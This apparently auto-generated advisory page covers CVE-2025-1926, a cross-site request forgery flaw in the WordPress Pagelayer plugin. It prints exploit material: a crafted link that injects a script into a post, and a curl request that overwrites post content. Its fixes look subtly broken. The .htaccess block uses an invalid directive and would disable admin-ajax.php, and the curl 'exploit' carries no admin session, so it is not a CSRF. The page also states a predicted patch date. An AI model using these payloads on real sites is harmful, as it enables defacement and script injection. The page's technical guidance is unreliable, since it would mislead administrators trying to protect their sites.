WordPress, Cross-Site Request Forgery (CSRF), CVE-2025-1926 (Medium)

Listen to this Post

How CVE-2025-1926 Works

The Page Builder: Pagelayer plugin (≤ v1.9.8) fails to implement proper nonce validation in the `pagelayer_save_post` function. Attackers craft malicious requests to modify WordPress post content when an admin clicks a malicious link. Since no CSRF token (nonce) is verified, the plugin processes unauthorized changes, leading to defacement, SEO spam, or malware injection.

DailyCVE Form

Platform: WordPress
Version: ≤ 1.9.8
Vulnerability: CSRF
Severity: Medium
Date: 05/25/2025

Prediction: Patch expected by 06/15/2025

What Undercode Say:

Exploitation

1. Malicious Link:

<a href="http://victim-site/wp-admin/admin-ajax.php?action=pagelayer_save_post&post_id=123&content=<script>alert(1)</script>">Click Me</a>

2. CURL Exploit:

curl -X POST "http://victim-site/wp-admin/admin-ajax.php" --data "action=pagelayer_save_post&post_id=123&content=HACKED"

Protection

1. Temporary Fix:

Add nonce check in `pagelayer_save_post`:

function pagelayer_save_post() {
if (!wp_verify_nonce($_REQUEST['_wpnonce'], 'pagelayer-save-post')) {
wp_die('Invalid nonce');
}
// Rest of the code
}

2. .htaccess Mitigation:

<Files "admin-ajax.php">
Require all denied
Require wp-admin
</Files>

Analytics

  • CVSS: 6.5 (Medium)
  • Attack Vector: Network
  • Privileges Required: None
  • User Interaction: Required

Detection

grep -r "pagelayer_save_post" /var/www/html/wp-content/plugins/pagelayer/

Patch Verification

wp plugin update pagelayer --dry-run

References

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top